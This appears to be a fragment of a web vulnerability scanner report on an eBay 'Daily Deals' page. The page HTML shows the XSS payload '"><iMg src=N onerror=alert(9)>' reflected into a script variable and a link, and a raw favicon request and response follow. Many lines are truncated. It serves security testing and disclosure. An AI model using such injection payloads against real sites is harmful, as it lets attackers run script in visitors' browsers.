isIE9 = 1; country = "><iMg src=N onerror=alert(9)>; currentPage = 'all'; trackingCode = '711-117568-2056-0'; </script> <div id="pageWrap"> <div class="masthead contain"> <header> <div class="pageWrap"> <a href="http://ebay.com" class="logoLink link logoImg" tabindex="1"><h1>ebay</h1 <nav> <ul> <li class="selected"><a href="?p=all&s="><iMg src=N onerror=alert(9)>" class="link" tabindex="4">All Deals</a></li> </ul> </nav> <div id="searchZone"> <input type="hidden" id="searchUrl" value="http://rover.ebay <input type="text" class="searchField link tab-2" size="60" maxlength="300" value="" id="_nkw" name="_nkw" autocomplete="off" tabindex="2"> <input type="button" id="searchBtn" class="button blue btnSmall link tab-3" value="Search" tabindex="3" onclick="doSearch()" /> </div> </div> </header> </div><!-- }}} header --> <div class="pageWrap"> <section> <div id="dailyDeals" class="floatLeft dailyUs">Daily Deals</div><h2 class="pageTitle">Grab yourself a great deal!</h2> <div class="dealItems contain clear" id="dealCarousel"> <div class="dealItem" draggable="true" ondragstart="DragHandler <section> <div class="mainDealContent contain"> <h3 id="dealInfoTitle" ></h3> <div id="dealInfoImage"></div> <div> <p class="reduction" id="dealInfoSavings"></p> <ul class="buyDetails"> <li class="rrp" id="dealInfoRRP"></li> <li id="dealInfoPrice"></li> </ul> </div> </div> <div class="dealOptions"> <div class="dealOptionsLeft"> <span class="bold small">Postage:</span> <div id="dealInfoFreeShipping" class="orangeText smaller bold">Free shipping</div> </div> <div class="dealOptionsRight"> <span class="bold small">Payments</span> <div id="dealInfoPayPal"><img alt="PayPal Accepted" src="images/payPalLogo </div> </div> <div> <div class="btnFav contain floatLeft marginT5" id="dealInfoAdded"><span class="smallHeart">Saved< <div class="floatRight marginT5"> <div id="dealInfoBuyItNow" class="link" ><a class="button link" href="#" target="_blank">View details</a></div> <div class="rrpLegal marginT5" id="dealInfoLegalText"> </div> <div onclick="addToFavorites </div> </section> </div> <div class="dealsTitle smallHeart"><p><span>+ <div id="dropZone"> <div id="favoriteItems"></div> <div id="itemsToBeDropped" ondrop="DropHandler(this, event);dehighliteDropZone <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> <div class="itemToBeDropped"> </div> <div id="socialNetworksArea" > <div id="shareThisSquare" class="orange"> <p> <img src="images/share-this-uk <div class="clear floatLeft"><a href="http://twitter.com <div class="clear floatLeft"><a href="http://www.facebook <div class="clear floatLeft"><a href="http://www </div> </div> <div id="subscribeSquare" class="orange"> <p><img src="images/share-this-uk <div> <a id="addSlice" href="javascript:void(0)" class="link" onclick='addToFav();'> </div> <div><a id="pinLink" href="javascript:void(0)" class="link" ><img src="images/pin.gif" alt="pin" /><span>Pin to start menu</span></a></div> </div> </div> </div> </div><!-- }}} dealItems --> </section> <!-- footer --> <footer id="glbfooter"> <!-- language parameter for all countries IE9/Chome App--> <!-- UK footer --> <!-- US footer --> <div id="footerLinks"> <div class="floatLeft"> <ul> <li><a rel="nofollow" class="link" target="_blank" href="http://pages.ebay </ul> </div> <div class="floatRight"> <ul> <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index <li style="float:right"><a rel="nofollow" class="link" href="/apps/deals/index </ul> </div> </div> <!-- German footer --> <!-- Australian footer --> </footer> <!-- }}} footer --> </div><!-- }}} pageWrap --> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="js/browserExtensions <script type="text/javascript"> //<![CDATA[ jQuery().browserExte targetNode : '#pageWrap', // Inserts alert before this ID browser : 'chrome', backgroundImg : 'images/bkGradient.png', icon : 'images/icon.png', introText : 'Stay connected to eBay anywhere online with the eBay extension for Google Chrome', closeButton : 'images/close.png', installText : 'Install now', installURL : 'https://clients2.google siteLinkText : 'Find out more', siteLinkURL : 'http://anywhere.ebay.com }); //]]> </script> <!-- LV --> <script type="text/javascript" src="http://include <script type="text/javascript"> <!-- function trackFunc() { _rover.setAppId(503); // Page Impression var pageImpEvent = 2040537; var impEvt=_rover.create impEvt.setLVTrk(true); ebayLVTr.setRover(_rover) ebayLVTr.setPageImpEvent ebayLVTrClk._ebayLVT _rover.track(); } //--> </script> <!-- End LV Tag --> <script type="text/javascript" charset="utf-8"> var is_ssl = ("https:" == document.location var asset_host = is_ssl ? "https://s3.amazonaws.com document.write(unescape(" </script> <script type="text/javascript" charset="utf-8"> var feedback_widget_options = {}; feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options feedback_widget_options var feedback_widget = new GSFN.feedback_widget </script> </body> </html> |
Severity: | Information |
Confidence: | Firm |
Host: | http://anywhere.ebay.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: anywhere.ebay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: dp1=bvrvi/3%7C0 |
HTTP/1.1 200 OK Server: Apache/2.2.8 (CentOS) Last-Modified: Thu, 26 Aug 2010 17:34:20 GMT ETag: "3b8161-1ece-48ebd68 Accept-Ranges: bytes Content-Length: 7886 X-Cnection: close Content-Type: text/plain; charset=UTF-8 Expires: Sun, 15 Jan 2012 00:12:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 15 Jan 2012 00:12:07 GMT Connection: close ...... .... .....6......... .. ............ .h...f...(... ...@..... ......................... |